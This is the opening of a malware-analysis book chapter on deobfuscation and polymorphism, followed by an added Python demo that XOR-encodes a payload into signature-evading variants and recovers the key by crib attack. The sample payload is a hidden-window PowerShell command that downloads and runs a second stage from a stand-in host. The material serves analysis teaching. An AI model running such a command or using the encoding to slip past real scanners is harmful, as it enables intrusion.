In this chapter, we will cover the following topics:
Linux configuration for network traffic analysis
XOR deobfuscation
Malicious web script analysis
Bytecode decompilers
Document analysis
Redline: malware memory forensics
Malware intelligence
The battle never ends, and fighting malware is like trying to kill a multi-headed Hydra. The tools are dual-natured, offence and defence keep progressing, and the methods keep being reinvented. Still, a few features keep recurring:
Regression: Repeating an old attack against the uninitiated or unprepared catches the enemy unawares, and so remains an effective technique; a technique only has to be older than the target's defences, not older than its defenders.
Redundancy: A NOP sled in shellcode, for instance, is like buying insurance: it raises the probability of success manifold, because the hijacked control flow no longer has to land on one exact address but anywhere inside the sled.
Mutation: Polymorphism is currently the most effective and widespread technique. If you can't see it, you can't find it. Even being diverse and distributed is a form of mutation, as the threat landscape...
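As an added illustration of the mutation point above (and of the XOR deobfuscation topic listed for this chapter), the following Python is not code from the book. It encodes one constructed payload under randomly chosen repeating-key XOR keys, shows that a plaintext byte signature no longer matches any variant while the decode step stays identical, and recovers the key with a known-plaintext (crib) attack. The payload string, the crib `http://`, the function names and the scoring heuristic are all assumptions made for this example.

```python
"""Added example: polymorphic XOR encoding and its reversal (not from the book)."""
from __future__ import annotations

import random

# Constructed sample payload, standing in for a string a signature would match on.
PAYLOAD = (b"powershell.exe -w hidden -nop -c \"IEX((New-Object Net.WebClient)"
           b".DownloadString('http://example.invalid/stage2'))\"")
SIGNATURE = b"powershell"   # the byte pattern a naive static scanner looks for


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; the same call encodes and decodes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def mutate(payload: bytes, rng: random.Random, max_keylen: int = 4) -> tuple[bytes, bytes]:
    """Produce one polymorphic variant: a fresh key (no zero bytes, so every
    payload byte changes) and the payload encoded under it."""
    keylen = rng.randint(1, max_keylen)
    key = bytes(rng.randrange(1, 256) for _ in range(keylen))
    return key, xor_bytes(payload, key)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes in the printable ASCII range; a crude plausibility score."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 for b in data) / len(data)


def recover_key_by_crib(blob: bytes, crib: bytes, max_keylen: int = 4):
    """Known-plaintext attack on repeating-key XOR.

    For each candidate key length L and each offset, the crib pins down the
    key bytes under it (blob ^ crib).  A candidate is kept only if decoding the
    whole blob reproduces the full crib at that offset (which also checks the
    crib bytes beyond the first L) and yields the most printable plaintext.
    Shorter keys are tried first, so a periodic key is reported in its shortest
    form.  Returns (key, plaintext), or (None, None) if nothing fits.
    """
    best_key, best_plain, best_score = None, None, -1.0
    for keylen in range(1, max_keylen + 1):
        if len(crib) < keylen:
            break  # crib too short to pin every key byte
        for off in range(len(blob) - len(crib) + 1):
            key = bytearray(keylen)
            for j in range(keylen):
                key[(off + j) % keylen] = blob[off + j] ^ crib[j]
            plain = xor_bytes(blob, bytes(key))
            if plain[off:off + len(crib)] != crib:
                continue
            score = printable_ratio(plain)
            if score > best_score:
                best_key, best_plain, best_score = bytes(key), plain, score
    return best_key, best_plain


if __name__ == "__main__":
    rng = random.Random(2024)  # fixed seed so the demo is reproducible
    for _ in range(3):
        key, blob = mutate(PAYLOAD, rng)
        rkey, plain = recover_key_by_crib(blob, b"http://")
        print(f"key={key.hex():<8} signature_in_blob={SIGNATURE in blob} "
              f"recovered={rkey.hex() if rkey else None} ok={plain == PAYLOAD}")
```

Every variant the script prints has different bytes, none contains the `powershell` signature, yet the same short crib recovers the key each time: the encoded bytes mutate, the decoding logic does not, which is why an analyst targets the decoder rather than the payload bytes.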